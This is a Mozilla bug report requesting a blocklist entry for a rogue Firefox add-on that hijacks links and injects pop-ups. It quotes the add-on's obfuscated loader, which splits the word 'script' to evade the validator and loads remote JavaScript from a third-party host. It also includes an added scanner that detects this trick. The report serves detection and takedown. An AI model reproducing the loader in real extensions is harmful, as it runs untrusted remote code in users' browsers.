Closed Bug 1231010 Opened 9 years ago Closed 8 years ago

Rogue YouTube Video Downloader addon hijacking links and injecting pop ups

Categories

(Toolkit :: Blocklist Policy Requests, defect)

defect
Not set
normal

RESOLVED FIXED

People

(Reporter: Swarnava, Assigned: jorgev)

Details

The unlisted addon YouTube Video Downloader is currently executing remote code to hijack links and inject pop up ads. Homepage: http://addoncrop.com/youtube_video_downloader/

This has been brought to attention in the following post: https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/1

A quick inspection of its source code already shows a red flag in its include folder contents, namely the link_modifier.js file which contains the following code in its entirety:

    var s = document.createElement('scr'+'ipt');
    s.type = 'text/ja'+'va'+'scr'+'ipt';
    s.src = 'http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js';
    document.getElementsByTagName('head')[0].appendChild(s);

It is evident that the developer intended to bypass the AMO validator (when it was running for unlisted addons) by creating a dangerous element via string concatenation. In this file it loads and executes an external script.

I didn't find any notice/content policy informing the user of this malware-like behavior and don't think I needed to inspect more of the source code after finding that file.


Discourse link: https://discourse.mozilla-community.org/t/rogue-youtube-video-downloader-addon-hijacking-links-and-injecting-pop-ups/5784/1
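
The evasion described in the report above, as an added example that is not part of the original bug or of Mozilla's validator: a small scanner that folds string-literal concatenation before matching, run on the `link_modifier.js` contents quoted in the report. The function names are hypothetical, and the regex tokenizer does not handle regex literals or template strings, which an AST-based validator would.

```javascript
// Added example (not Mozilla's validator): fold 'a'+'b' string-literal
// concatenation before pattern matching, so split keywords become visible.

// One token: a quoted literal, a comment, or any single other character.
const TOKEN = /(['"])((?:\\.|(?!\1)[^\\\n])*)\1|\/\/[^\n]*|\/\*[\s\S]*?\*\/|[\s\S]/g;

// Returns the source with adjacent literals joined by "+" merged into one
// double-quoted literal. The result is for matching only, not for execution.
function foldStringConcats(src) {
  let out = '', lit = null, gap = '';
  const flush = () => {
    if (lit !== null) out += JSON.stringify(lit) + gap;
    lit = null; gap = '';
  };
  for (const m of src.matchAll(TOKEN)) {
    if (m[1] !== undefined) {                 // string literal
      if (lit !== null && gap.trim() === '+') { lit += m[2]; gap = ''; }
      else { flush(); lit = m[2]; }
    } else if (lit !== null && /^\s*\+?\s*$/.test(gap + m[0])) {
      gap += m[0];                            // whitespace or one "+" after a literal
    } else { flush(); out += m[0]; }
  }
  flush();
  return out;
}

const SCRIPT_TAG = /createElement\(\s*['"]script['"]\s*\)/i;
const REMOTE_SRC = /\.src\s*=\s*['"]((?:https?:)?\/\/[^'"]+)['"]/gi;

// Reports dynamic <script> creation and remote sources, and whether the
// element name only appears after folding (it was split to hide it).
function scanForRemoteScript(src) {
  const folded = foldStringConcats(src);
  const createsScript = SCRIPT_TAG.test(folded);
  return {
    createsScript,
    hiddenByConcat: createsScript && !SCRIPT_TAG.test(src),
    remoteSources: [...folded.matchAll(REMOTE_SRC)].map(m => m[1]),
  };
}

// Sample input: the link_modifier.js contents quoted in the report.
const sample = [
  "var s = document.createElement('scr'+'ipt');",
  "s.type = 'text/ja'+'va'+'scr'+'ipt';",
  "s.src = 'http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js';",
  "document.getElementsByTagName('head')[0].appendChild(s);",
].join('\n');
console.log(scanForRemoteScript(sample));
```

A file that sets `hiddenByConcat` is worth manual review even when the remote source list is empty, since the split element name has no purpose other than avoiding a literal match.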
I can't seem to find this addon on AMO. Is it only hosted from a 3rd party?
Right link from reddit board is http://www.iks.hs-merseburg.de/~gruni/netfaq/homepage-nutzen.html

Seems that it is an unlisted addon and only hosted from 3rd party
(In reply to Lars Gusowski [:lagu] from comment #2)
> Right link from reddit board is
> http://www.iks.hs-merseburg.de/~gruni/netfaq/homepage-nutzen.html
> 
> Seems that it is an unlisted addon and only hosted from 3rd party

Thanks Lars, our admins are in an all hands meeting and we will get to them asap
https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/ is the right link :(
Not sure why I posted a link to the test page from a university :/
Sorry for the delay. I contacted the developers and will give them some time to respond.
Assignee: nobody → jorge
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i1077
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit